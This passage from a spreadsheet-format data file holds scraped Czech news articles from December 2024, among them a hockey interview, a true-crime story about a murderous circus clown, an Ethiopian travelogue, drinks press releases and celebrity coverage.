důležitá část hry. „Když tu buly vyhrajete, tak lajna začíná s pukem a nemusíte se snažit dostat ten puk nazpátek. Když to prohrajete, tak musíte vynaložit energii, abyste dostali puk zpátky,“ vysvětlil bývalý hráč klubu Philadelphia Flyers , kde nějaký čas působil také Jaromír Jágr . „Dokonce jsme byli i sousedi,“ upřesnil Voráček . Za Jágrovou vytrvalostí v aktivní kariéře vidí především mimořádnou lásku ke sportu. „Že ten hokej opravdu tak milujete, což určitě nebyl můj případ,“ poznamenal překvapivě. Jakub Voráček s přítelkyní kvůli své lásce zlomili dvě srdce. Nešlo s tím hnout, říká hokejista „Hokej je kvalitní v tom, že se v něm od mládí učíte respekt k autoritám, respekt ke spoluhráčům, společně vyhrávat, společně prohrávat. A potom, když se vám to povede, tak je to pořád, a když si v sobě ponecháte to dítě a tu radost ze hry, tak je to o to záživnější. Ale dneska už je to takové moc profesionální a je to dřina. Je to navíc stále rychlejší,“ uvedl sportovec. Také se prý změnil trend ve fyzických proporcích hráčů. Zatímco dříve bývali hokejisté vysocí a statní, dnes dominují menší a subtilnější. „Kluci mívali 190 centimetrů a sto pět kilo, teď se to mění, že mají 180 cm a 75 až 80 kilo, a o to jsou rychlejší,“ popsal Voráček změny ve výběru hráčů. Mimo to také prozradil, že se stal předobrazem maskota svého amerického klubu nebo to, že nezkrotné emoce a peprné nadávky jsou od hokeje neoddělitelné. „Je to součást srandy. Já myslím, že v tom dnešním světě se všechno bere moc vážně,“ uvedl úspěšný sportovec v pořadu Show Jana Krause , který můžete sledovat každou středu od 21.40 na Primě. Hosté pořadu byli také Andrea Bezděková a Sebastian Navrátil : Autor článku Odesláním formuláře souhlasíte s podmínkami zpracování osobních údajů Sdílejte článek Autor: Šarlota Chmelařová Autor person Šarlota Chmelařová</t>
  </si>
  <si>
    <t>155740</t>
  </si>
  <si>
    <t>147700</t>
  </si>
  <si>
    <t>20241201_219_3475400123_63512353f00c0de68b2c.html</t>
  </si>
  <si>
    <t>63512353f00c0de68b2c</t>
  </si>
  <si>
    <t>Zamilovaný klaun jako v hororu. Vraždil jak posedlý, aby se pomstil</t>
  </si>
  <si>
    <t>Zamilovaný klaun jako v hororu. Vraždil jak posedlý, aby se pomstil Podvedený manžel se živil jako klaun v cirkuse. Časem se rozhodl vraždit 1. 12. 2024 Autor: Simona Haraštová Co se stane, když se láska promění v posedlost a touha po pomstě v krvavou lázeň? Veselý klaun, symbol radosti a smíchu, se přetvořil v krvavého vraha. Jeho příběh je hororovější, než si dokážete představit. Případ přerostl do obludných výšin, až se jím začal zabývat dokonce Interpol. reklama Před lety se na červeném seznamu Interpolu ocitla tvář muže, který vyvraždil rodinu Chicových. Kdyby nedošlo ke šťastné náhodě, trvalo by možná roky, než by byl pachatel dopaden. A možná by ani nebyl nebo by byl odsouzen někdo jiný. Série vražd s podobným scénářem RED NOTICE neboli „červené oznámení“ je „žádost orgánů činných v trestním řízení na celém světě, aby nalezly a dočasně zatkly osobu čekající na vydání, předání nebo podobné právní nároky. Nejde o mezinárodní zatykač“, jak se dočteme na interpol.int. První mrtvola klečela nahá bez dechu před stromem, jako by se modlila. Byla to jedna z nejkrásnějších dívek v okolí – Melinda Consuela Chic. Příčinou smrti byly dva průstřely do zad. „Je jí šestnáct, tedy bylo jí, narodila se ve Španělsku a byla zasnoubená s mladým Gomezem, ale je to pár dní, co se začalo říkat, že zasnoubení zrušila,“ vysvětloval četník Rivera. Pro druhou vraždu si zabiják vybral opět střelnou zbraň. Zemřela další dívka, Melindina sestra Carmelita. Nehybné tělo odpočívalo v sedu v noční košili u toaletního stolku. Prosektura potvrdila, že smrt nastala použitím shodné zbraně jako u Melindy. Při ohledání místa činu kriminalisté zajistili stopy, pořídili fotografie a sejmuli otisky prstů. Bylo jim jasné, že to tu vrah velmi dobře znal. Jednak nebyly násilím otevřené dveře a jednak byli psi v klidu, protože pachatele nejspíš dobře znali. Naivní stopařky a drsné metody seržanta z Floridy Další obětí byla matka obou zemřelých dívek. Policie ji našla na koberci v kaluži krve, Juanita Chic dostala také dva průstřely jako její dcerky. Ve hře byl ještě její malý syn Pedro, kterého kriminalisté nemohli najít. Bylo zřejmé, že se nějaký psychopat rozhodl vyvraždit celou rodinu. Ti, kteří byli podezřelí Když došlo k první vraždě, okruh podezřelých se pohyboval okolo ctitelů krásné Melindy. Na kahánku měl její bývalý snoubenec Roberto Gomez. Jeho vzezření naivního milovníka a neprůstřelné alibi utvrdily vyšetřovatele v tom, že on to být nemohl. „Mě to strašně překvapilo. Hrozně moc ji miluju a ona mi taky pořád říkala, že beze mě nechce žít. A najednou konec,“ tvrdil Roberto. Melindina láska totiž skončila, jako když motýl přelétne na jinou květinu. Našla si jiného chlapa jménem Antonio Gonzales. Byl to potulný herec, který zamotal Melindě hlavu. A měl alibi. V Melindině životě existoval ještě jeden ctitel, Paolo Castro , o kterém ona ale nechtěla nic slyšet a stále jej odháněla. Na dobu vraždy měl zaručené alibi, neboť prohrával v hospodě v kartách. Mezinárodní zátah na pašeráky odhalil 19 000 ukradených historických vzácností Tajemství fotografie v rámečku K rozluštění případu napomohla fotografie neznámého muže. Ještě před vraždícím běsněním si místní lidé všimli, že rozvedenou paní Chic občas navštívil neznámý chlap, který vždycky přijel a odjel a nikdy se moc dlouho nezdržel. Při domovní prohlídce inspektor Fernandez objevil záhadnou fotografii, na které byl právě tento muž, k němuž směřovalo další odůvodněné podezření. Zjistilo se, že to byl první manžel paní Chic z dob jejího cirkusového období. Podle identifikace Interpolu se vrah a bývalý manžel jmenoval Manuel Ortega Ramos. Vystupoval v cirkusu jako klaun, uměl žonglovat a krotit divokou zvěř. Jejich krátké manželství ukončila zrada krásné Juanity a její útěk s bohatším a lépe situovaným mužem, se kterým potom měla tři děti. Po letech se s ním rozvedla a znovu se setkala se svým prvním partnerem klaunem. Ten se však za ta léta osamocení a důsledkem zrady dal na alkohol . Paní Chic mu opět dala košem a utekla před ním do Bolívie . Manuel si ji našel a z pomsty vyvraždil celou její rodinu. Jeho dopadení bylo pro policii tvrdý oříšek a hodně při tom pomohl Interpol a náhoda. Zvláště komisař Cerrado od policie v Barceloně měl velké štěstí, když jel v drožce a kápnul tam na hledaného vraha. Využil příležitost a nasadil mu želízka. „Jaké jsem měl štěstí. Vyplivl mi auťák, skočil jsem do prvního kočáru a najednou jsem seděl proti chlápkovi s klukem, kterého hledá Interpol. Dneska ráno jsem měl jejich fotky v ruce. Tak jsem si jeho fajnovej ksicht pamatoval. No, a je to,“ vypráví Cerrado. Interpol v tomto případu sehrál klíčovou úlohu. Vždy je při dopadení či hledání zločince stěžejní spolupráce Interpolu a místní policie. „Vyšetřování a zatýkání vždy provádějí národní a místní složky. Naší úlohou je pomoci národní policii komunikovat s policií v jiných zemích při řešení mezinárodních zločinů,“ uvádí interpol.int. Když dojde k závažnému zločinu, je nutné tuto okolnost nejprve nahlásit v zemi, ve které se to stalo. Teprve potom přijde ke slovu Interpol. Zdroje: autorský článek spolu s dalšími zdroji (V. P. Borovička: Slavné případy Interpolu, interpol.int) KAM DÁL: Kolínský gang. Při svých akcích zločinci neznali slitování. https://www.ctidoma.cz/clanek/zajimavosti/zamilovany-klaun-jako-v-hororu-vrazdil-jak-posedly-aby-se-pomstil-79636 Autor: Simona Haraštová Autor person Simona Haraštová</t>
  </si>
  <si>
    <t>124340</t>
  </si>
  <si>
    <t>2520</t>
  </si>
  <si>
    <t>20241201_22_3479104187_87c392f418806d293130.html</t>
  </si>
  <si>
    <t>87c392f418806d293130</t>
  </si>
  <si>
    <t>Na jihu si skalpu Mountfieldu obzvlášť váží. Neměli jsme ani metr ledu, lituje hradecký trenér Hokejisté Motoru přidali čtvrtý korálek na šňůru extraligových vítězství , když zdolali 4:2 Hradec Králové . Radost z toho měli velikou, skalp Mountfieldu si v Českých Budějovicích obzvlášť cení s ohledem na rivalitu vzniklou odchodem klíčového sponzora z města před jedenácti lety.... Celý článek naleznete na: www.sport.cz/... Autor: Sport.cz</t>
  </si>
  <si>
    <t>20241201_220_3475357245_5958764e8a1fac0d68f3.html</t>
  </si>
  <si>
    <t>5958764e8a1fac0d68f3</t>
  </si>
  <si>
    <t>Napříč Afrikou. Súdánská vízová anabáze v&amp;nbsp;Etiopii</t>
  </si>
  <si>
    <t>Napříč Afrikou . Súdánská vízová anabáze v&amp;nbsp; Etiopii Napříč Afrikou . Súdánská vízová anabáze v Etiopii Addis Abeba fakt ne… #Cestopis na pokračování. Dvacátá osmá epizoda. Cesta stopem do Addis Abeby v nehorázně nepříjemné společnosti krvelačných blech bere týden. Psychické síly nám ještě úplně nedošly jen díky prvotřídní kávě, kterou se několikrát denně oblažujeme, abychom resetovali bleší rezignaci. Rituál spojený s její přípravou je fascinující: baristka nejprve na zem rozsype čerstvě namletou kávu, na kterou potom rozprostře natrhanou trávu a na tu položí plechový nebo keramický tácek se žhavými uhlíky. Na rozpálené uhlíky postaví krásnou keramickou konvičku zvanou jebena , ve které je už káva dobře promíchaná s vodou a trochou cukru. Nápoj se pomalu přivede k varu. Potom se konvička sundá z uhlíků a nechá se odpočinout. Následně se ještě na chviličku na uhlíky vrátí. Mezitímně se na vyřezávaném dřevěném tácku připraví malé bílé keramické šálky s barevnými motivy. Jakmile je hotovo, nacpe se do hrdla jebeny tráva, která při nalévání působí jako sítko. Vůně v kavárně je až omamná. Jestliže jsem dříve přirovnal účinky etiopské kávy ke sklenici nejlepšího vína , můžu ještě dodat, že její účinky jsou také podobné »dusíkovému opojení« při hloubkových ponorech. S Míšou tomu říkáme „jdu si dýchnout do padesátky“, čímž se rozumí padesátimetrová hloubka a 6 barů působících na dusík v krvi. Protikladem k těmto báječným stavům je škrábání boků sežraných od blech až do živého. Plejáda podnětů, stavů, chutí a bůhví čeho ještě je v Etiopii extrémní. Prožíváme to nejkrásnější, a to nejodpornější zároveň. Je to vyčerpávající. Addis Abeba se třemi a půl milionem lidí leží v nadmořské výšce kolem 2 400 m na úpatí hory Entoto. Je to typická africká díra se vším nepořádkem, bídou i mrakodrapy a hrstkou bohatých, která k chudým dírám vždycky patří, a je o to bohatší, o co chudší je většina chudáků ve městě. Kdybychom si nemuseli prodloužit etiopská víza, a hlavně vyřídit víza do Súdánu , obětovali bychom Addis Abebě maximálně dva dny. Prodloužení etiopských víz o další měsíc zvládáme během prvního dne, což je unikátní výkon, protože africká byrokracie dokáže zkomplikovat i sebejednodušší úkon. Se súdánskými vízy to ale bude složitější. Hned následujícího dne míříme na súdánskou ambasádu. Žadatel tady musí čekat v hale plné lidí, aniž by se kdekoli registroval, než k němu někdo přijde. Uniformovaný ouřada si ale lidi vybírá náhodně nebo podle natolik zašifrovaného klíče, že na to normální cestou nelze přijít. K nám dorazil po čtyřech hodinách čekání, když jsem se rozhodl přepočítat si zbytek hotovosti. Dostali jsme formulář, na kterém ale musíme donést výslovné doporučení k cestě do Súdánu vypracované naší ambasádou. Další kroky budou následovat až potom. Když pominu, že jsme tady čtyři hodiny čekali zbytečně a přišli o jednu přepočítávanou bankovku, nemůžu nemyslet na to, jak se asi budou tvářit na naší ambasádě, až je budeme přemlouvat, aby nás doporučili k cestě do Súdánu , kde právě zuří dvě hodně krvavé války. Bereme si tágo a přejíždíme na českou ambasádu. Zavřeno. Otevřeno bude až v pondělí, dnes je čtvrtek. Do pondělka hibernujeme v guest housu. Jediné pozitivum, které bych rozhodně vyzdvihnul je to, že v nás cosi dozrálo a indžera, kterou jsme dlouho nemohli pozřít, nám začala opravdu chutnat. Ba co víc, získali jsme na její zvláštní chuti určitou závislost. Najednou si nedokážeme představit, že odjedeme z Etiopie a nebudeme mít svou denní dávku indžery. Ta placka je magicky dobrá. V pondělí ráno jsme připraveni u české ambasády. Odháníme dva žebráky, překračujeme spícího ožralu a vstupujeme do budovy. Přes vrátného, hlídače, uklízečku, přidavače, poskoka, zapisovače, tři nadbytečné čády a úředníka se konečně dostáváme až k české konzulce. Celý náš příběh jsme museli vysvětlit všem uvedeným, ale teprve teď to má smysl. Konzulka s přimhouřeným obočím bedlivě sleduje každé naše slovo, jako profesorka při státnicích, která vás má v hrsti a náležitě si to užívá. Mračí se a kroutí hlavou na znamení nesouhlasu. Žádné doporučení prý nebude, Súdán je nebezpečný. Žebráme, abychom mohli pokračovat v cestě Afrikou . Co je toto za systém? Musíme prosit o povolení jako nějací zlodějíčci o odpuštění? To prostě odmítám. Ne! Proto Afrikou necestujeme. „Projíždíme stopem celou Afriku ,“ začínám trochu ostřeji, ale stále velmi slušně, „máme za sebou už více než rok dlouhé a náročné cesty. Naším cílem je doputovat po zemi až do Egypta . Súdánci požadují doporučení. Chtějí ho od vás. Riskujeme vlastní krk, nikoli váš. Tady je formulář, tady jsou pasy.“ Lína huba, holé neštěstí, říkám si. Pustil jsem ji proto trochu na špacír. Konzulka je překvapená. Probodla nás přísným pohledem, kterým by se snad dala propíchnout i karibská vúdú panenka. Z pozice žebrajících do pozice diktujících. A proč ne? Jsme Češi v Etiopii a tato instituce tady je pro Čechy v Etiopii . Konzulka vůčihledně koketuje s postavením si hlavy. Hluboce vydechla, a ještě víc se zamračila. „Nechte to tady a přijďte zítra odpoledne. Musím to probrat na poradě. Mulatu vás dovede k východu,“ říká stroze a gestem posílá úředníka, aby nás vyprovodil. Věděli jsme, že získat víza do Súdánu bude náročné, ale že bychom skončili hned na české ambasádě? To snad ne. Celý den nervózně chodíme po městě. Sžírá nás nejistota. Děsíme se toho, že nebudeme moci uskutečnit naši cestu napříč celou Afrikou kvůli absenci jednoho prapodivného doporučení. Další den v poledne se vracíme na ambasádu. Mulatu se netváří moc přátelsky. „Jak se vede, Mulatu?“ zkouším prolomit ledy a obnovit v té sterilní soše lidskou bytost. Marně. Vykulil oči v úleku, že jsem na něho promluvil, a potom strnul v ještě větší úřednické křeči. No nevadí, asi to nebude žádný velký vypravěč. Vstupujeme do kanceláře konzulky. Ta si nás hned ve dveřích přeměřuje tím svým profesorským pohledem. „V současné době,“ říká konzulka, „si nemůžeme dovolit žádný problém se súdánskou stranou. Vlastně na sebe vůbec nechceme upozorňovat. Letadla do Káhiry létají pravidelně. Myslím, že není co řešit. Bylo by to koneckonců velmi riskantní i pro vás. Podle mých informací ze Súdánu byste to patrně stejně nepřežili.“ „Paní konzulko,“ odpovídám, „kdybychom se měli řídit všemi varováními, která nás předem pochovávala, ukončili bychom naši cestu po Africe už v Mauretánii . My jsme ale tady, máme za sebou tři desítky afrických zemí, a ještě dvě africké země před sebou. Jednou z nich je Súdán , jinudy se na sever cestovat nedá. Věřte tomu, že už víme, jak cestovat rizikovými oblastmi.“ „Rozmyslete si to,“ říká. „Ten formulář, prosím,“ ukazuji na vyplněný formulář s razítkem, kterého jsem si už stačil na stole všimnout. „Zbytečně si komplikuji život. Tady to máte, ale buďte maximálně opatrní, a jakmile vstoupíte do Egypta , pošlete mi zprávu na toto číslo. Opravdu teď nepotřebuji dva mrtvé nebo unesené Čechy s mým podpisem na doporučení.“ „Děkujeme.“ „Mulatu vás vyprovodí.“ Bereme si formulář a odcházíme. Mulatu má obvyklý nepřítomný výraz. Nemůže se dočkat, až mu padne. „Hodně štěstí,“ volá na nás ještě konzulka, když procházíme dveřmi kanceláře, „a prosím vás přežijte to!“ Máme doporučení (a výzvu k přežití) z naší ambasády, to ale neznamená, že máme súdánské vízum. Je to jen první z mnoha kroků. Míříme rovnou na súdánské velvyslanectví. S obavami vstupujeme do čekárny našlapané desítkami lidí. Jeden člověk ale z davu na první pohled výrazně vyčnívá. Není to nikdo jiný, než náš jihoafrický kamarád Jacques. „Nazdar lidi, tak vy už jste taky tady? To bude chtít dýmku míru!“ huláká na nás šťastně. „Nazdar, brácho,“ odpovídám trochu tišeji než Jacques, s alespoň minimální úctou k ostatním, které on vůbec nevnímá. Přisedáme k Jacquesovi a vzájemně si vykládáme, kudy a jak jsme se dostali do Addis Abeby . Díky našemu povídání poměrně rychle utekly tři hodiny čekání. Jsme na řadě, pokud se to tak dá říci, protože tady žádná řada není a systém jsme stále nepochopili. Myslím, že žádný neexistuje, ale určitě je možné ho jednorázově zakoupit, čemuž se nakonec nejsme schopni vyhnout (jinak bychom tam asi seděli ještě teď). Bituňk holt byl, nedalo se svítit. Konečně opouštíme čekárnu a dostáváme se o úroveň výše k prvnímu úředníkovi. Bere si naše doporučení, dlouze je studuje, šklebe se do nich jako do nějakých nepovedených komiksů. Potom si bere naše pasy a důkladně je prohlíží. Mezi stránkami si nás kontroluje ostrými krátkými pohledy, které jako by nám říkaly: „Mám vás v hrsti, bělásci.“ Za chvilku nám podává další formulář. Rovnou jej vyplňujeme. Jsou tam klasické otázky: proč jedete do Súdánu , koho tam znáte, kam budete cestovat, kde budete bydlet, jaké je vaše náboženské vyznání a podobné. Po úspěšném vyplnění se dostáváme o další úroveň výše. Tentokrát nás má ve spárech tlustý černoch v saku bez rukávů. Požaduje potvrzení o očkování proti žluté zimnici a břišnímu tyfu. Ptá se na žloutenku a HIV. Procházíme celkem hladce a konečně se dostáváme do nejvyššího patra. Tady se asi rozhoduje. V další, teď už ale menší, čekárně, sedíme asi hodinu. Potom jsme vyzváni ke vstupu do kanceláře. Podle autoritativního pohledu robustního černocha za psacím stolem hádám, že to už bude větší ryba. Vykládá něco o válkách a nebezpečí. Už to přestávám vnímat. Dívám se z okna jako ve škole, když mě k smrti nudila stará vyhořelá učitelka, která by nejraději dělala všechno jiné, jen kdyby už nemusela učit, ale bohužel nic jiného neuměla, takže to musela doklepat do důchodu. Jediný rozdíl spatřuji v tom, že za školním oknem nebyl takový neuvěřitelný nepořádek, po parapetu se neprocházel šváb, bylo chladněji a nedrbal jsem si blechami rozkousaný bok. Bože, dal bych si kávu. Vyplňujeme další formulář a následně ještě jeden. Poté nám černoch se jmenovkou Hailemariam Birto sděluje, že požadavek bude přezkoumán ve lhůtě třiceti dnů. Náš výraz má asi vysokou vypovídací hodnotu, protože rychle dodává, že se můžeme stavit za dva týdny a zeptat se, zda už není hotovo. Na otázku, jakou máme šanci vízum získat, odpovídá stroze: malou. Před budovou ještě půl hodiny čekáme na Jacquese, který prošel stejnou anabází jako my. Potom spolu míříme na kávu, abychom se psychicky napravili, a dále do naší ubytovny. Nebydlíme příliš dobře. Nemohli jsme nic sehnat, a tak jsme vzali pokoj v jakémsi temném sklepení, které funguje jako hodinový hotel. Slabé stěny nemilosrdně prozrazují vše. První bouchnutí dveří, chychotání, klid, vzdychání, výkřik, klid, druhé a závěrečné bouchnutí dveří. A tak pořád dokola. Na úrovni zvukového vjemu poznáváme nespočet jednorázových etiopských vztahů. Nazítří odpoledne jdeme s Jacquesem na kávu a pár piv . V průběhu večera přišla esemeska od Sebastiana. Noha se mu zlepšila, zítra dorazí autobusem. Směrujeme ho na naši adresu. Jacques se k nám zatím stěhovat nebude. Bydlí u nějakých rastafariánů a je tam prý nad míru spokojen. Rastové nonstop hulí jako by nemělo být zítra. „Jacquesi, proč vlastně pořád čoudíš? Vždyť ty nikdy nestihneš vystříbřit…“ ptám se posilněn několika pivy . „Chceš to vědět, brácho?“ odpovídá trochu tajemně. Přikyvuji. „Je to moje poslední cesta, kámo, úplně poslední,“ pokračuje Jacques vážným tónem, „jsem HIV pozitivní. Nakazil jsem se ve dvaceti od jedné černošky. Už je po smrti. Je mi dvacet devět. Cítím, že mi brzo začnou docházet síly, a ještě před tím chci doputovat až nakonec Afriky a dát si na vrcholu pyramidy brko…“ (Připomínám, že se píší nultá léta. Léky zdaleka neumí to, co dnes.) Večer už moc nemluvíme. Sdílíme to beze slov… (Pokračování a bohužel i zbytek Jacquesova životního příběhu i naší cesty najdete v knize Cesta k branám Damašku východní Afrikou .) Zdroje: HAVELKA, Ondřej. Cesta k branám Damašku východní Afrikou . Praha : Akbar, 2016. HAVELKA, Ondřej. Africká náboženství: religionistika, teologie, afrikanistika . Praha : Dingir, 2024.</t>
  </si>
  <si>
    <t>20241201_221_3475369498_b34803d9c4757ef4e677.html</t>
  </si>
  <si>
    <t>b34803d9c4757ef4e677</t>
  </si>
  <si>
    <t>Pivovar Bernard uvařil na svátky dva pivní speciály</t>
  </si>
  <si>
    <t>Pivovar Bernard uvařil na svátky dva pivní speciály Na letošní vánoční svátky připravil Bernard dva pivní speciály – polotma Adventní speciál a limitovanou edici Ležáku s chmelem z Vysočiny. Bernard na předvánoční období přichystal Adventní speciál, zdroj: Rodinný pivovar Bernard. Rodinný pivovar Bernard připravil na letošní svátky dvě piva – polotmavý Adventní speciál a limitovanou edici Ležáku s chmelem z Vysočiny . „Polotmavou třináctku s hustou pěnou jsme uvařili z výběru kvalitních sladů – českého, bavorského, karamelového a čokoládového,“ popisuje Josef Vávra , vrchní sládek a generální ředitel pivovaru. Adventní speciál má příjemnou vůni s tóny karamelu a sladu, harmonickou chuť a vyváženou hořkost. Obsah alkoholu činí 5,6 %, hořkost dosahuje 32 jednotek hořkosti (IBU). K dostání je výhradně čepovaný v hospodách a restauracích. „Koření“ pro druhou sváteční novinku, Ležák s chmelem z Vysočiny , narostlo na loni založené chmelnici v nadmořské výšce 560 metrů. Na svahu za městem pivovar poprvé vypěstoval a sklidil úrodu ze 144 rostlin šesti odrůd chmele. „Chmel z naší chmelnice je plnohodnotný, aromatický a pivo z něj lidem chutná. Navazuje tak na tradici, kdy jsem chmel do speciálu pěstoval několik let jen doma na zahradě,“ říká Josef Vávra. Ležák s chmelem z Vysočiny je jedenáctka s obsahem alkoholu 4,7 % a hořkostí 38 IBU. Oba speciály jsou limitovanou záležitostí, k ochutnání budou od prvního adventního týdne v podnicích s čepovaným pivem Bernard, Ležák s chmelem z Vysočiny bude dostupný i v lahvích ve značkových prodejnách pivovaru . -stk- Autor: MediaGuru</t>
  </si>
  <si>
    <t>5480</t>
  </si>
  <si>
    <t>5620</t>
  </si>
  <si>
    <t>20241201_222_3475369502_9bb7cfb990d93ae16ae1.html</t>
  </si>
  <si>
    <t>9bb7cfb990d93ae16ae1</t>
  </si>
  <si>
    <t>Rum Dictador představuje uměleckou edici Game Changer</t>
  </si>
  <si>
    <t>Rum Dictador představuje uměleckou edici Game Changer Značka rumu Dictador uvádí na českém trhu exkluzivní edici, jejíž lahev vytvořil designér Richard Orlinski. Umělecká edice Game Change rumu Dictador, zdroj: Palírna U Zeleného stromu Palírna U Zeleného stromu přiváží do České republiky uměleckou edici rumu Dictador od designéra Richarda Orlinskiho. Novinka nese název Game Changer a oslavuje kreativitu, individualitu a vzdor proti zajetým kolejím. „Dictador je světovou uměleckou značkou alkoholu . V její DNA se mísí trocha rebelie proti všemu obyčejnému, obdiv k současnému a respekt k tradičnímu umění, smysl pro moderní technologie a v neposlední řadě láska k řemeslu a kvalitnímu alkoholu . Tuto lásku k tradicím má Palírna U Zeleného stromu se značkou Dictador společnou. I proto jsme se rozhodli právě tuto značku na český trh distribuovat a jsme rádi, že i my můžeme Čechům představit nový rum spojující kvalitní alkohol a umělecké dílo,“ říká Kateřina Ceralová , brand manažerka Palírny U Zeleného stromu. Značka Dictador si zakládá na spolupráci se streetartovými umělci . V roce 2021 se ručně malovaná lahev Fierce Kong od Richarda Orlinskiho prodala za 100 tisíc dolarů. Letos s tímto francouzským umělcem a DJ spolupracuje Dictador opět, a to na edici s názvem Game Changer , v níž se spojuje karibský rum s hravostí, rebelstvím a krásou lahve. „Originální tvar lahve, která bude žádaná nejen mezi milovníky originálního pití, ale také mezi sběrateli, má několik barevných variant. V České republice bude k dostání pouze v šedé a neonově žluté barvě,“ říká Kateřina Ceralová . Dictador Game Changer bude k dostání v e-shopech s kvalitním alkoholem . Doporučená cena dárkového balení je 3500 Kč. -stk- Autor: MediaGuru</t>
  </si>
  <si>
    <t>20241201_223_3475247428_f66e6f05cadc06a9a337.html</t>
  </si>
  <si>
    <t>f66e6f05cadc06a9a337</t>
  </si>
  <si>
    <t>Téhle dámě je 60?! Miss Kateřina Průšová ukázala krásnou maminku a s partnerem se snaží o miminko</t>
  </si>
  <si>
    <t>Téhle dámě je 60?! Miss Kateřina Průšová ukázala krásnou maminku a s partnerem se snaží o miminko close 6 fotografií I když už se modelingem neživí, stále si Kateřina Průšová drží krásnou štíhlou postavu a muži na ní můžou oči nechat. Pokud si ale někdo myslí, že si brzy založí profil na internetové platformě OnlyFans, ten se pořádně plete. Ona má úplně jiné plány, ráda by se co nejdříve stala maminkou. Kdo by si nepamatoval vítězku soutěže krásy Miss České republiky z roku 2002 Kateřinu Průšovou ? Ta dnes slaví čtyřicáté narozeniny, ale rozhodně na svůj věk nevypadá. Svou postavu a mladistvý vzhled ovšem rozhodně nemá zadarmo. Bývalá modelka se netají tím, že sport je její životní styl. Dnes už sice nezvládá tolik jako před lety, ale stále se o sebe snaží co nejvíc pečovat. Kvalitně spí, omezila alkohol na minimum a poctivě se stará o svou pleť s pomocí kvalitní kosmetiky. Takhle před lety probíhalo zkrášlování Kateřiny Průšové , podívejte se: Zdroj: Youtube Dnešní generace je úplně jinde V nedávném rozhovoru se Kateřina Průšová rozpovídala o tom, jak moc je současná generace mladých dívek jiná, než tomu bylo v době, kdy ona sama vyhrála soutěž krásy. Tehdy se upřednostňovala přirozenost a vyžadoval ji i bývalý ředitel Miss České republiky Miloš Zapletal . „Dřív holky nemohly mít upravená prsa nebo změněný obličej. Dnes jsou ta kritéria jiná,“ prozradila Průšová webu Extra. Sama pak mladým dívkám nedoporučuje na svých profilech na sociálních sítích ukazovat „dokonalost“ a pomáhat si k ní nějakou šikovnou mobilní aplikací. „Ten FaceApp si může dovolit ženská čtyřicet plus, ale všechno s citem. Když už máte Instagram a živíte se tím, mělo by to být trošku důvěryhodné pro toho fanouška,“ sdělila svůj názor. Odhalené snímky do světa posílat nebude Jelikož je stále krásná a má špičkovou postavu, určitě by si mohla hezky přivydělávat prostřednictvím kontroverzní platformy OnlyFans, koneckonců úspěchy tam slavila v minulosti i Simona Krainová . Podobným směrem se ale Kateřina Průšová vydávat nechce. „Zaprvé by mi to neprošlo doma a zadruhé mě to nikdy nenapadlo – nejsem zas takový střelec, že bych se takhle ukazovala veřejně. Není to nic pro mě,“ cituje její slova web Aktuálně. Mimochodem, bývalá modelka svou přirozenou krásu nejspíš tak trochu zdědila po mamince. Nedávno sdílela na Instagramu společné fotky se svou maminkou, která zrovna slavila 60. narozeniny. Šest křížků na krku byste ale paní Ivetě rozhodně nehádali. Dokonce bez nadsázky na fotce vypadaly více jako sestry. „60 let. Jsi kočka, maminko moje. Krásné narozeniny,“ okomentovala Průšová snímek. gallery 6 video Touží se stát maminkou Vzhledem ke své přirozené kráse a osobnímu kouzlu měla Kateřina Průšová během života mnoho tajných ctitelů. Hlouběji do jejího srdce se dostal podnikatel Petr Vlasák, se kterým randila několik let. Blonďatá kráska se později provdala za byznysmena Vladimíra Konvalinku, jenže jejich manželství příliš šťastné nebylo. V posledních letech je šťastná s partnerem Michalem. Nemá ale zapotřebí lásku dávat na odiv, oba shodně upřednostňují život v soukromí. Nedávno se v jednom rozhovoru Průšová svěřila, že si moc přeje dítě. S partnerem se o něj navíc už nějakou dobu snaží, ale zatím je prý příroda proti. „Je to strašně citlivé, nechci to moc rozvádět, ale věřte mi, že jsem neplánovala mít rodinu ve čtyřiceti. Někdy přírodě nemůžete poručit. Takže samozřejmě si miminko přeji. Moc si přeji rodinu a věřím, že to dopadne dobře,“ uvádí web Prima Ženy. Dnešní doba ale mateřství po čtyřicítce přeje, koneckonců v minulosti hned několik celebrit v ještě pozdějším roku porodilo. Za zmínku stojí prezidentka nadace Kapka naděje Vendula Pizingerová , která svého syna Josefa porodila v osmačtyřiceti letech. Zpěvačka Bára Basiková pak svého syna Theodora přivedla na svět v roce 2009 a tehdy jí bylo 46 let. Kateřině držíme pěsti. Související články Kateřina Průšová vypadá stále skvěle, moc nyní touží po miminku. Kateřina Průšová se svou krásnou maminkou. Vypadají jako sestry, že? Kateřina Průšová už s exmanželem Konvalinkou dlouho není. Kateřina Průšová byla jednou z našich nejkrásnějších modelek. Kateřina Průšová měla vždy štíhlou postavu. Kateřině Průšové mladistvá tvářička z Miss zůstala dodnes.</t>
  </si>
  <si>
    <t>133980</t>
  </si>
  <si>
    <t>122150</t>
  </si>
  <si>
    <t>20241201_224_3475191266_8084e8ad36c875dd4f28.html</t>
  </si>
  <si>
    <t>8084e8ad36c875dd4f28</t>
  </si>
  <si>
    <t>Arogance, nemístné vtipy a&amp;nbsp;naprosto zkažený večer: Háma a&amp;nbsp;Sokol zase kazí Slavíky</t>
  </si>
  <si>
    <t>Arogance, nemístné vtipy a&amp;nbsp;naprosto zkažený večer: Háma a&amp;nbsp; Sokol zase kazí Slavíky Arogance, nemístné vtipy a naprosto zkažený večer: Háma a Sokol zase kazí Slavíky Sledovala jsem právě probíhající předávání cen Český slavík 2024 ve Foru Karlín a musím říct, že mě moderátorská dvojice Ondřej Sokol a Aleš Háma opět zklamala. Jejich vtipné poznámky a urážky na adresu přítomných překročily všechny meze vkusu. Hned v úvodu večera začal Ondřej Sokol urážet svého moderátorského kolegu slovy, že Aleš Háma vypadá na 62 let, a to je už obstarožní věk. Nebo ten jejich pokus o zpěv na začátku celého večera se rovněž nepovedl. To byl teprve začátek dlouhé řady nevhodných poznámek, které měly následovat. Například to, že dráty od hudebních nástrojů jsou schované v zemi stejně tak, jako Miraovy dráty v čelisti. Naprosto nevhodný vtip, kterému se vlastně nikdo nesmál, jen oni dva. A když došlo na samotné vyhlašování? To byl teprve trapas. „Nechceme tady být do 3. adventní neděle, budeme svižní. Nejdelší bývá to děkování, tak jsme si připravili takový děkovací manuál,“ řekli moderátoři a dodali, že není ani za co děkovat. „Neplakejte, to štěkaní tady nepůsobí dobře. A nechcete vypadat v televizi jako rozmazaná nána,“ uráželi tak nějak všechny dohromady. Není to poprvé, co tato moderátorská dvojice předvedla podobný výkon. Jejich 